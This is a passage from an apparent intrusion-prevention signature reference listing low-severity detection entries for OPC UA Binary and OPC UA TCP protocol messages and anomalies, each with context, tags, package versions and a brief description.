About this situation: OPC UA Binary Create Monitored Items Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Create Monitored Items Request.
Back to top

OPC-UA-Binary-Create-Monitored-Items-Rsp

About this situation: OPC UA Binary Create Monitored Items Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Create Monitored Items Response.
Back to top

OPC-UA-Binary-Create-Session-Req

About this situation: OPC UA Binary Create Session Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Create Session Request.
Back to top

OPC-UA-Binary-Create-Session-Rsp

About this situation: OPC UA Binary Create Session Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Create Session Rsp.
Back to top

OPC-UA-Binary-Create-Subscription-Req

About this situation: OPC UA Binary Create Subscription Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Create Subscription Request.
Back to top

OPC-UA-Binary-Create-Subscription-Rsp

About this situation: OPC UA Binary Create Subscription Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Create Subscription Response.
Back to top

OPC-UA-Binary-Delete-Monitored-Items-Req

About this situation: OPC UA Binary Delete Monitored Items Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Delete Monitored Items Request.
Back to top

OPC-UA-Binary-Delete-Monitored-Items-Rsp

About this situation: OPC UA Binary Delete Monitored Items Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Delete Monitored Items Response.
Back to top

OPC-UA-Binary-Delete-Nodes-Req

About this situation: OPC UA Binary Delete Nodes Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Delete Nodes Request.
Back to top

OPC-UA-Binary-Delete-Nodes-Rsp

About this situation: OPC UA Binary Delete Nodes Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Delete Nodes Response.
Back to top

OPC-UA-Binary-Delete-References-Req

About this situation: OPC UA Binary Delete References Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Delete References Request.
Back to top

OPC-UA-Binary-Delete-References-Rsp

About this situation: OPC UA Binary Delete References Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Delete References Response.
Back to top

OPC-UA-Binary-Delete-Subscriptions-Req

About this situation: OPC UA Binary Delete Subscriptions Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Delete Subscriptions Request.
Back to top

OPC-UA-Binary-Delete-Subscriptions-Rsp

About this situation: OPC UA Binary Delete Subscriptions Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Delete Subscriptions Response.
Back to top

OPC-UA-Binary-Find-Servers-Req

About this situation: OPC UA Binary Find Servers Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Find Servers Request.
Back to top

OPC-UA-Binary-Find-Servers-Rsp

About this situation: OPC UA Binary Find Servers Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Find Servers Response.
Back to top

OPC-UA-Binary-Get-Endpoints-Req

About this situation: OPC UA Binary Get Endpoints Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Get Endpoints Request.
Back to top

OPC-UA-Binary-Get-Endpoints-Rsp

About this situation: OPC UA Binary Get Endpoints Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Get Endpoints Response.
Back to top

OPC-UA-Binary-History-Read-Req

About this situation: OPC UA Binary History Read Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary History Read Request.
Back to top

OPC-UA-Binary-History-Read-Rsp

About this situation: OPC UA Binary History Read Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary History Read Response.
Back to top

OPC-UA-Binary-History-Update-Req

About this situation: OPC UA Binary History Update Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary History Update Request.
Back to top

OPC-UA-Binary-History-Update-Rsp

About this situation: OPC UA Binary History Update Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary History Update Response.
Back to top

OPC-UA-Binary-Modify-Monitored-Item-Req

About this situation: OPC UA Binary Modify Monitored Item Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Modify Monitored Item Request.
Back to top

OPC-UA-Binary-Modify-Monitored-Item-Rsp

About this situation: OPC UA Binary Modify Monitored Item Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Modify Monitored Item Response.
Back to top

OPC-UA-Binary-Modify-Subscription-Req

About this situation: OPC UA Binary Modify Subscription Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Modify Subscription Request.
Back to top

OPC-UA-Binary-Modify-Subscription-Rsp

About this situation: OPC UA Binary Modify Subscription Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Modify Subscription Response.
Back to top

OPC-UA-Binary-Parse-Error

About this situation: OPC UA Binary parse error
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA Binary parser error has occurred.
Back to top

OPC-UA-Binary-Publish-Req

About this situation: OPC UA Binary Publish Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Publish Request.
Back to top

OPC-UA-Binary-Publish-Rsp

About this situation: OPC UA Binary Publish Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Publish Response.
Back to top

OPC-UA-Binary-Query-First-Req

About this situation: OPC UA Binary Query First Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Query First Request.
Back to top

OPC-UA-Binary-Query-First-Rsp

About this situation: OPC UA Binary Query First Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Query First Response.
Back to top

OPC-UA-Binary-Query-Next-Req

About this situation: OPC UA Binary Query Next Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Query Next Request.
Back to top

OPC-UA-Binary-Query-Next-Rsp

About this situation: OPC UA Binary Query Next Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Query Next Response.
Back to top

OPC-UA-Binary-Read-Req

About this situation: OPC UA Binary Read Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Read Request.
Back to top

OPC-UA-Binary-Read-Rsp

About this situation: OPC UA Binary Read Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Read Response.
Back to top

OPC-UA-Binary-Register-Nodes-Req

About this situation: OPC UA Binary Register Nodes Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Register Nodes Request.
Back to top

OPC-UA-Binary-Register-Nodes-Rsp

About this situation: OPC UA Binary Register Nodes Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Register Nodes Response.
Back to top

OPC-UA-Binary-Register-Server-Req

About this situation: OPC UA Binary Register Server Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Register Server Request.
Back to top

OPC-UA-Binary-Register-Server-Rsp

About this situation: OPC UA Binary Register Server Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Register Server Response.
Back to top

OPC-UA-Binary-Republish-Req

About this situation: OPC UA Binary Republish Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Republish Request.
Back to top

OPC-UA-Binary-Republish-Rsp

About this situation: OPC UA Binary Republish Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Republish Response.
Back to top

OPC-UA-Binary-Service-Fault

About this situation: OPC UA Binary Service Fault.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Service Fault.
Back to top

OPC-UA-Binary-Set-Monitoring-Mode-Req

About this situation: OPC UA Binary Set Monitoring Mode Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Set Monitoring Mode Request.
Back to top

OPC-UA-Binary-Set-Monitoring-Mode-Rsp

About this situation: OPC UA Binary Set Monitoring Mode Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Set Monitoring Mode Response.
Back to top

OPC-UA-Binary-Set-Publishing-Mode-Req

About this situation: OPC UA Binary Set Publishing Mode Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Set Publishing Mode Request.
Back to top

OPC-UA-Binary-Set-Publishing-Mode-Rsp

About this situation: OPC UA Binary Set Publishing Mode Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Set Publishing Mode Response.
Back to top

OPC-UA-Binary-Set-Triggering-Req

About this situation: OPC UA Binary Set Triggering Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Set Triggering Request.
Back to top

OPC-UA-Binary-Set-Triggering-Rsp

About this situation: OPC UA Binary Set Triggering Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Set Triggering Response.
Back to top

OPC-UA-Binary-Transfer-Subscriptions-Req

About this situation: OPC UA Binary Transfer Subscriptions Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Transfer Subscriptions Request.
Back to top

OPC-UA-Binary-Transfer-Subscriptions-Rsp

About this situation: OPC UA Binary Transfer Subscriptions Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Transfer Subscriptions Response.
Back to top

OPC-UA-Binary-Translate-Browse-Paths-To-Nodeids-Req

About this situation: OPC UA Binary Translate Browse Paths To Nodeids Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Translate Browse Paths To Nodeids Request.
Back to top

OPC-UA-Binary-Translate-Browse-Paths-To-Nodeids-Rsp

About this situation: OPC UA Binary Translate Browse Paths To Nodeids Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Translate Browse Paths To Nodeids Response.
Back to top

OPC-UA-Binary-Unregister-Nodes-Req

About this situation: OPC UA Binary Unregister Nodes Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Unregister Nodes Request.
Back to top

OPC-UA-Binary-Unregister-Nodes-Rsp

About this situation: OPC UA Binary Unregister Nodes Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Unregister Nodes Response.
Back to top

OPC-UA-Binary-Write-Req

About this situation: OPC UA Binary Write Req.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Write Request.
Back to top

OPC-UA-Binary-Write-Rsp

About this situation: OPC UA Binary Write Rsp.
Context: OPC UA Binary without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Binary Write Response.
Back to top

OPC-UA-TCP

About this situation: OPC UA TCP traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1118-5242
Description: OPC UA TCP is a transport protocol for OPC UA (Unified Architecture) traffic. OPC UA is a SCADA protocol.
Back to top

OPC-UA-TCP-Abort-Message

About this situation: OPC UA TCP Abort was seen
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA TCP Abort message was seen.
Back to top

OPC-UA-TCP-Ack-Message

About this situation: OPC UA TCP Acknowledge was seen
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA TCP Acknowledge message was seen.
Back to top

OPC-UA-TCP-Certificate-Expired

About this situation: OPC UA TCP Certificate Expired.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA TCP Certificate Expired.
Back to top

OPC-UA-TCP-Certificate-Syntax-Error

About this situation: OPC UA TCP Certificate Syntax Error.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA TCP Certificate Syntax Error.
Back to top

OPC-UA-TCP-Certificate-Verify-Failed

About this situation: OPC UA TCP Certificate verify failed.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA TCP Certificate verify failed.
Back to top

OPC-UA-TCP-Certificates-Do-Not-Match

About this situation: OPC UA TCP Certificates Do Not Match.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The receiver certificate of the request must match with sender certicate of the response, and likewise the sender certificate of the request must match the receiver certificate of the reponse.
Back to top

OPC-UA-TCP-Close-Message

About this situation: OPC UA TCP Close message was seen
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA TCP Close message was seen.
Back to top

OPC-UA-TCP-Double-Open-Request

About this situation: OPC UA TCP Double Open Request.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA TCP Open Secure Channel Request sent twice without a response in between.
Back to top

OPC-UA-TCP-Double-Request

About this situation: OPC UA TCP Double Request.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An OPC UA request with the same ID sent twice.
Back to top

OPC-UA-TCP-Double-Response

About this situation: OPC UA TCP Double Response.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An OPC UA response with the same ID sent twice.
Back to top

OPC-UA-TCP-Early-Response

About this situation: OPC UA TCP Early Response.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An OPC UA response seen before the request has completed.
Back to top

OPC-UA-TCP-Early-Security-Token-Adoption

About this situation: OPC UA TCP Early Security Token Adoption.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An OPC UA server uses a new Security Token before the client has used it.
Back to top

OPC-UA-TCP-Error-Message

About this situation: OPC UA TCP Error message was seen
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA TCP Error message was seen.
Back to top

OPC-UA-TCP-Hello-Message

About this situation: OPC UA TCP Hello message was seen
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA TCP Hello message was seen.
Back to top

OPC-UA-TCP-Incomplete-Request-Expired

About this situation: OPC UA TCP Incomplete Request Expired.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Requests are cache by the engine. This situation is generated when a request expires from the cache before completion.
Back to top

OPC-UA-TCP-Invalid-Secure-Channel

About this situation: OPC UA TCP Invalid Secure Channel.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: A message has an invalid Secure Channel Id. It probably does not belong to the channel in which it was seen.
Back to top

OPC-UA-TCP-Key-Too-Long

About this situation: OPC UA TCP Key Too Long.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The public key of the certificate is too long for the chosen security policy.
Back to top

OPC-UA-TCP-Key-Too-Short

About this situation: OPC UA TCP Key Too Short.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The public key of the certificate is too short for the chosen security policy.
Back to top

OPC-UA-TCP-Memory-Allocation-Error

About this situation: OPC UA TCP Memory Allocation Error.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An allocation of additional memory has failed in the OPC UA parser.
Back to top

OPC-UA-TCP-Message-Verification-Failed

About this situation: OPC UA TCP Message Verification Failed.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The verification of the signature of an OPC UA message failed.
Back to top

OPC-UA-TCP-Msg-Message

About this situation: OPC UA TCP Message was seen
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA TCP MSG Message was seen.
Back to top

OPC-UA-TCP-Non-Consecutive-Sequence-Numbers

About this situation: OPC UA TCP Non Consecutive Sequence Numbers.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The sequence number of an OPC UA message is not the previous sequence number plus one.
Back to top

OPC-UA-TCP-Non-Constant-Padding

About this situation: OPC UA TCP non constant padding.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The padding of an encrypted message is not the least significant byte of the padding length.
Back to top

OPC-UA-TCP-Non-Trusted-Ca

About this situation: OPC UA TCP Non Trusted Ca.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The CA used to sign an OPC UA client or server is not in the list of trusted CAs.
Back to top

OPC-UA-TCP-Open-Message

About this situation: OPC UA TCP Open message was seen
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA TCP Open message was seen.
Back to top

OPC-UA-TCP-Parse-Error

About this situation: OPC UA TCP message not recognized or not conforming to protocol
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An OPC UA TCP message not recognized or not conforming to protocol.
Back to top

OPC-UA-TCP-Response-With-Changed-Policy

About this situation: OPC UA TCP Response With Changed Policy.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An OPC UA Open Secure Channel Response has a different policy than the request.
Back to top

OPC-UA-TCP-Security-Token-Issue

About this situation: OPC UA TCP Security Token Issue.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: A new Security Token issue request.
Back to top

OPC-UA-TCP-Security-Token-Renew

About this situation: OPC UA Tcp Security Token Renew.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: A Security Token renew request.
Back to top

OPC-UA-TCP-Self-Signed-Certificate

About this situation: OPC UA TCP Self Signed Certificate.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Use of a self signed certificate in an Open Secure Channel request or response.
Back to top

OPC-UA-TCP-Sequence-Number-Wrap

About this situation: OPC UA TCP Sequence Number Wrap.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Sequence numbers wrap when the current sequence number is less than 1024 and the previous was larger than 2^32 - 1024.
Back to top

OPC-UA-TCP-Unknown-Certificate

About this situation: OPC UA TCP Unknown Certificate.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Use of an unknown certificate in encrypted traffic in transparent mode.
Back to top

OPC-UA-TCP-Unknown-Security-Policy

About this situation: OPC UA TCP Unknown Security Policy.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA Open Secure Channel request or response uses an unknown security policy.
Back to top

OPC-UA-TCP-Unknown-Security-Token

About this situation: OPC UA TCP Unknown Security Token.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: A use of an unknown security token.
Back to top

OPC-UA-TCP-Unrecoverable-Error

About this situation: OPC UA TCP Unrecoverable Error.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An unrecoverable error has occurred in OPC UA parser.
Back to top

OPC-UA-TCP-Unsolicited-Open-Response

About this situation: OPC UA TCP Unsolicited Open Response.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: OPC UA TCP Unsolicited Open Secure Channel Response.
Back to top

OPC-UA-TCP-Unsolicited-Response

About this situation: OPC UA TCP Unsolicited Response.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An unsolicited OPC UA response.
Back to top

OPC-UA-TCP-Unused-Security-Token

About this situation: OPC UA TCP Unused Security Token.
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: A new security token is taken into use but the previous one has not been used.
Back to top

OPC-UA-TCP-Using-Expired-Credentials

About this situation: OPC UA TCP server or client is using expired credentials
Context: OPC UA TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-812-5242
Description: An OPC UA TCP server or client is using expired credentials.
Back to top

OPC-UA-TCP_ActivateSession-Request

About this situation: An OPC UA TCP ActivateSession request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_ActivateSession-Response

About this situation: An OPC UA TCP ActivateSession response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_AddNodes-Request

About this situation: An OPC UA TCP AddNodes request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_AddNodes-Response

About this situation: An OPC UA TCP AddNodes response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_AddReferences-Request

About this situation: An OPC UA TCP AddReferences request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_AddReferences-Response

About this situation: An OPC UA TCP AddReferences response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Browse-Request

